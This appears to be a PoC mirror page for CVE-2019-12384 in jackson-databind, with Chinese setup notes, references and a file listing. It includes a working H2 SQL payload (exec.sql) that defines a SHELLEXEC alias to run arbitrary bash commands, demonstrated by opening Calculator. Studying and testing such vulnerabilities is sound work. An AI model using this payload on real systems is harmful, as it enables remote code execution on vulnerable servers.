CVE-2019-12384 PoC — FasterXML jackson-databind 代码问题漏洞

Source

https://github.com/MagicZer0/Jackson_RCE-CVE-2019-12384

Associated Vulnerability

Title:FasterXML jackson-databind 代码问题漏洞 (CVE-2019-12384)
Description:FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible.

Description

CVE-2019-12384 漏洞测试环境

Readme

# 环境搭建

将项目导入到idea，再配置好maven之后设置自动导入依赖库，然后在本地的web空目录写入如下文件，保存为exec.sql。并启动一个http server：

```
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"/bin/bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A");
    return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('open /Applications/Calculator.app')
```

请注意修改代码中对应的部分，适配不同的操作系统环境。

# 运行结果

可以看到弹出计算器。

# 漏洞参考

https://blog.doyensec.com/2019/07/22/jackson-gadgets.html

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html

https://www.anquanke.com/post/id/182695

File Snapshot


 [4.0K]  /data/pocs/a1dba518df9655b16c2f569bea8bc03314f20faa
├── [  81]  Jackson-newGadget.iml
├── [ 11K]  LICENSE
├── [1.7K]  pom.xml
├── [ 883]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            └── [ 924]  Main.java

3 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!